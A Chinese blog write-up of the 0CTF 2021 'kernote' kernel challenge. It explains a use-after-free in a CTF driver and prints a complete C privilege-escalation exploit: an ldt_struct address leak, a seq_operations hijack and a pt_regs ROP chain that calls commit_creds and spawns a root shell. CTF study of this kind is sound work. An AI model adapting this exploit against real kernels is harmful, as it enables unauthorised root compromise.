【ldt_struct】0ctf2021-kernote

已于 2023-10-04 23:45:29 修改
阅读量196 收藏
点赞数
分类专栏: # kernel-pwn 文章标签: kernel-pwn
于 2023-10-04 23:41:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133563905
版权

前言 

题目给的文件系统是 ext4,所以我们只需要将其挂载即可使用:

1、创建一个空目录

2、使用 mount 将其挂载即可

3、使用 umount 卸载即可完成打包

开启了 smap、smep、kaslr 和 kpti 保护,并且给了如下内核编译选项:

Here are some kernel config options in case you need it
```
CONFIG_SLAB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
```

可以看到这里使用的是 slab 分配器而不是默认的 slub 分配器:

  • 开启了 Random Freelist(slab 的 freelist 会进行一定的随机化)
  • 开启了 Hardened Freelist(slab 的 freelist 中的 object 的 next 指针会与一个 cookie 进行异或(参照 glibc 的 safe-linking))
  • 开启了 Hardened Usercopy(在向内核拷贝数据时会进行检查,检查地址是否存在、是否在堆栈中、是否为 slab 中 object、是否非内核 .text 段内地址等等
  • 开启了 Static Usermodehelper Path(modprobe_path 为只读,不可修改)

 漏洞利用

驱动程序比较简单,就一个 ioctl 函数,实现了四个功能,给了一个 32 字节大小的 UAF,并且有写 8 字节的能力。

漏洞的产生在于在释放了 buf[idx] 时,虽然将其置零了,但是我们可以通过 note 继续操作释放的堆块,这里就导致了 UAF。

这里需要注意的是本题使用的是 slab 分配器,其最小的堆块大小就是 32 字节了,所以这里的 ldt_struct 也是会分配到 32 字节的 object,所以这里选择 ldt_struct 泄漏内核基地址,然后再劫持 seq_operations,利用 pt_regs 一套带走。

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>

#define SECONDARY_STARTUP_64 0xffffffff81000040

size_t pop_rdi = 0xffffffff81075c4c; // pop rdi ; ret
size_t init_cred = 0xffffffff8266b780;
size_t commit_creds = 0xffffffff810c9dd0;
size_t add_rsp_xx = 0xFFFFFFFF81A1B270;
size_t swapgs_kpti = 0xFFFFFFFF81C00FB8;

int seq_fd;
char buffer[8];

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

int fd;
void add(size_t idx)
{
        ioctl(fd, 0x6667, idx);
}

void dele(size_t idx)
{
        ioctl(fd, 0x6668, idx);
}

void note_get(size_t idx)
{
        ioctl(fd, 0x6666, idx);
}

void note_write(size_t data)
{
        ioctl(fd, 0x6669, data);
}



int main(int argc, char** argv, char** env)
{
        bind_core(0);
        int res;
        int pipe_fd[2];
        size_t* buf;
        size_t temp;
        size_t page_offset_base;
        size_t search_addr;
        size_t kernel_offset;
        struct user_desc desc = { 0 };

        fd = open("/dev/kernote", O_RDWR);
        if (fd < 0) err_exit("Failed to open /dev/kernote");

        add(0);
        note_get(0);
        dele(0);

        page_offset_base = 0xffff888000000000;
        desc.base_addr = 0xff0000;
        desc.entry_number = 0x8000 / 8;
        syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
        while (1)
        {
                note_write(page_offset_base);
                res = syscall(SYS_modify_ldt, 0, &temp, 8);
                if (res > 0) break;
                else if (res == 0) err_exit("Error in leak page_offset_base by ldt_struct");
                page_offset_base += 0x4000000;
        }
        hexx("page_offset_base", page_offset_base);

        pipe(pipe_fd);
        buf = malloc(0x1000*sizeof(size_t));
        kernel_offset = -1;
        search_addr = page_offset_base;
        while (1)
        {
                note_write(search_addr);
                if (!fork())
                {
                        res = syscall(SYS_modify_ldt, 0, buf, 0x8000);
                        for (int i = 0; i < 0x1000; i++)
                                if (buf[i] > 0xffffffff81000000 && (buf[i]&0xfff) == 0x040)
                                {
                                        kernel_offset = buf[i] - SECONDARY_STARTUP_64;
                                        break;
                                }
                        write(pipe_fd[1], &kernel_offset, 8);
                        exit(0);
                }
                wait(NULL);
                read(pipe_fd[0], &kernel_offset, 8);
                if (kernel_offset != -1) break;
                search_addr += 0x8000;
        }
        hexx("kernel_offset", kernel_offset);

        pop_rdi += kernel_offset;
        init_cred += kernel_offset;
        commit_creds += kernel_offset;
        swapgs_kpti += kernel_offset;
        add_rsp_xx += kernel_offset;
        hexx("add_rsp_xx", add_rsp_xx);

        add(1);
        note_get(1);
        dele(1);

        seq_fd = open("/proc/self/stat", O_RDONLY);
        if (seq_fd < 0) err_exit("Failed to open /proc/self/stat");
        note_write(add_rsp_xx);

        asm(
        "mov r15, pop_rdi;"
        "mov r14, init_cred;"
        "mov r13, commit_creds;"
        "mov r12, swapgs_kpti;"
        "xor rax, rax;"
        "mov rdi, seq_fd;"
        "mov rsi, buffer;"
        "mov rdx, 8;"
        "syscall;"
        );

        hexx("UID", getuid());
        system("/bin/sh");

        return 0;
}

 效果如下:

彩蛋

这里调试时,又无法在 seq_operations->start 这里断住,思考了好久,最后想到了,seq_operations->start 是在 seq_read_iter 中被调用的,所以直接把断点打在 seq_read_iter 这里,然后再跟几步就可以跟到 seq_operations_start 了。以后就直接这样调试了

其实我们要注意栈回溯,如果断点断不下来,我们可以往前回溯,然后跟几步就 ok 了

参考:【CTF.0x05】TCTF2021-FINAL 两道 kernel pwn 题解 - arttnba3's blog

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0001-TIPS-2020-hxp-kernel-rop : ret2user
blind cat
06-18 528
在内核态执行用户空间的指令。
Church's Coupon Performance Test Script
热门推荐
Annie的专栏
07-04 7万+
    2015年6月针对church's coupon app做了并发压力测试,HP LR在11.5版本第一次支持在移动设备的录制对Server压力测试。也是本人第一次在移动设备上压力测试实践。工具使用的是 HP LoadRunner 12.02 Community Edition。(社区版可以免费支持50个虚拟用户并发,此版本工具当时是最新版,尚没有任何破解的license)LoadRunne...
ldt_struct结构体的利用】RWCTF2023-Digging-into-kernel-3
qq_61670993的博客
10-04 199
ldt_struct 结构体泄漏内核地址
【USMA】N1CTF2022-praymoon
qq_61670993的博客
10-22 604
USMA
【user_key_payload、msg_msg、pipe_buffer】再探RWCTF2023-Digging-into-kernel-3
qq_61670993的博客
10-05 441
利用 msg_msg 和 user_key_payload 去泄漏内核基地址。
2024-5-12
qq_61670993的博客
05-13 208
又是摆烂的一天
360chunqiu2017_smallest —— 从例题理解SROP
Tokameine的博客
08-29 1275
前言: 本篇博客为个人学习过程中的理解,仅记录个人理解,WIKI写的要比本篇详细得多。若与其存在矛盾,请以WIKI为准,也感谢读者指出问题。 正文: SROP(Sigreturn Oriented Programming),与常规ROP的区别在于通过sigreturn函数来进行返回而不是retn指令 这里引用WIKI中对Signal机制的介绍: Signal 机制¶ Signal 机制是类 unix 系统中进程之间相互传递信息的一...
2023-10-4
qq_61670993的博客
10-05 39
2023-10-5
linux pwn 基础知识
sky123博客
08-11 2546
环境搭建 虚拟机安装 镜像下载网站 为了避免环境问题建议 22.04 ,20.04,18.04,16.04 等常见版本 ubuntu 虚拟机环境各准备一份。注意定期更新快照以防意外。 虚拟机建议硬盘 256 G 以上,内存也尽量大一些。硬盘大小只是上界,256 G 不是真就占了 256 G,而后期如果硬盘空间不足会很麻烦。 基础工具 vim sudo apt install vim gedit 不习惯 vim 的可以使用 gedit 文本编辑器。 sudo apt install gedit git
新版客户端临时修复补丁_LDT_
09-28
"新版客户端临时修复补丁_LDT_"是针对Latale游戏客户端的一个更新,主要目的是解决现有版本中的一些问题或者增强用户体验。LDT可能是开发团队的缩写,也可能是项目代号,它标识了这个补丁的归属。 Latale是一款网络...
Robust_LDT_dane
03-19
标题“Robust_LDT_dane”可能指的是一个与鲁棒线性决策树(Robust Linear Decision Trees, LDTs)相关的项目或数据集。在Python编程环境中,这种类型的模型通常用于处理具有噪声或异常值的数据,以提高预测的稳定性...
debuuf.zip_LDT修改器_SPF解包_latale Extractor_spf打包工具_登录
09-24
这里提到的"debuuf.zip"文件包含了一系列与特定游戏或应用程序相关的工具,主要用于处理LDT(可能是一种数据格式)和SPF文件。下面将详细解释这些概念以及它们在IT领域的应用。 首先,"LDT修改器"是一个工具,它...
ldt.rar_V2
09-14
标题“ldt.rar_V2”指的是一个针对Linux操作系统内核版本2.13.6的更新或补丁,其中包含了处理32位和64位模式下调用的改进。这个压缩包包含两个文件:ldt.c和ldt.h,它们是C语言源代码文件,很可能用于定义和实现与...
ldt.rar_The Call
09-21
在Linux操作系统中,`modify_ldt`是一个系统调用,用于修改进程的本地描述符表(Local Descriptor Table,简称LDT)。LDT是x86架构中的一个关键组件,它在保护模式下运行的系统中起到重要作用。这篇文章将深入探讨`...
Arcmap天地图历史影像插件全国版-免费!免费!
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包
07-22
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 通过网上交易这个平台,我们足不出户就可以了解商品的信息和价格,不仅方便了用户也为用户节约了时间,系统的主要功能就是:商品类别管理、商品信息管理、订单管理、会员管理、系统公告管理等。分为管理员用户、会员用户这二种用户平台。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
mysql安装配置教程
07-22
MySQL的安装和配置过程可能因操作系统和版本而异,但以下是一些通用的步骤,适用于大多数情况: ### Windows系统安装MySQL: 1. **下载MySQL Installer**: - 访问[MySQL官方网站](https://dev.mysql.com/downloads/installer/)下载MySQL Installer。 2. **启动MySQL Installer**: - 运行下载的安装程序。 3. **选择安装类型**: - 选择“Developer Default”安装类型,它包括MySQL Server和常用的开发工具。 4. **配置MySQL Server**: - 在“Server Instance Configuration”中,输入root用户的密码,并配置MySQL的安装路径。 5. **详细配置**: - 根据需要配置MySQL Server的详细设置,如字符集、默认存储引擎等。 6. **安装**: - 检查配置,然后点击“Execute”开始安装。 7. **安装完成**: -
文化娱乐-微博情感分析-含实验报告-约150行(分词、朴素贝叶斯模型).rar
最新发布
07-22
数据可视化实例的python实现,可供学习了解
彩虹岛spf打包解包源码_ldt修改器
08-29
彩虹岛是一款大型多人在线角色扮演游戏,而SPF打包解包源码是指用于解包和打包SPF文件的程序源代码。SPF文件是彩虹岛游戏中存储角色和物品数据的文件格式。有了SPF打包解包源码,我们可以自行解包SPF文件,提取其中的数据并进行修改;同时,也可以将修改后的数据重新打包回SPF文件,以达到修改游戏中角色和物品数据的目的。 而LDT修改器是指彩虹岛游戏中的一个工具,它可以对角色进行修改和定制。利用LDT修改器,玩家可以更改角色的外观、能力、装备等属性,满足自己的游戏需求。 所以,彩虹岛SPF打包解包源码和LDT修改器都是为了让玩家能够自定义游戏数据和角色属性的工具。通过使用这些工具,玩家可以根据自己的喜好和需求调整游戏体验,增加乐趣和挑战。但需要注意的是,修改游戏数据可能违反游戏规则,对游戏的平衡性和公平性产生影响。因此,在使用这些工具时,我们应该遵守游戏规则,并谨慎使用,以免影响自己和其他玩家的游戏体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值